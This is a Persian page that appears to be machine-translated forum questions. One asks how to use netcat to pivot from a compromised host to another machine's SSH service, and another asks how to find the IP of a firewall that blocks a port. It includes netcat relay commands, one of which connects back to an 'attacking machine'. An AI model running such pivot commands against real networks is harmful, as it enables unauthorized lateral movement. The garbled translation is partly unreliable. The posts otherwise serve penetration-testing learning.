آزمون نفوذ – استفاده از Netcat به Pivot

بنابراین من یک پوسته را به دستگاه A که اس اس را نصب نکرده است و نمی توانم پوسته تتی را دریافت کنم (من تمام ورق های تقلب را امتحان کردم، من فکر می کنم این عمدا است)

Through دستگاه AI میتواند دستگاه B را که دارای یک سرور ssh در حال اجرا در پورت 2222 است را ببیند.

آنچه که من می خواهم انجام دهم این است که چطور از netcat برای اتصال به ssh به صورت دستی استفاده کنم یا از netcat برای رفتن از ماشین حمله به ماشین استفاده کنم من به ماشین B.

ابتدا سعی کردم nc -lvp 444 -c 'nc machine.b 2222' اما من نمی توانم به دستگاه A متصل شود، من حدس می زنم قوانین فایروال.

بعدا سعی کردم اتصال مجدد به دستگاه حمله من nc attacking.machine 444 -c 'nc machine.b 2222' که کار می کند اما متوجه شدم که وقتی به ماشین حمله من فرستاده می شود، می توانم دسترسی به پورت برای اتصال به آن با ssh.

این طراحی شبکه است … من فکر می کنم

 اینجا را وارد کنید تصویر

nmap – اطلاعات IP یا نام میزبان فایروال را پیدا کنید؟

آیا راهی برای پیدا کردن IP فایروال وجود دارد که دسترسی من به نقطه پایانی را مسدود می کند؟

من netcat / nmap را امتحان کردم، اما موفق نشدم.

من نیاز به نوعی ابزار دارم که traceroute را انجام می دهد به زیر شبکه یا IP که دسترسی را مسدود می کند، بنابراین می توانم بدانم که فایروال دسترسی من به یک پورت را در یک نقطه پایانی مسدود می کند؟

با تشکر،
ویک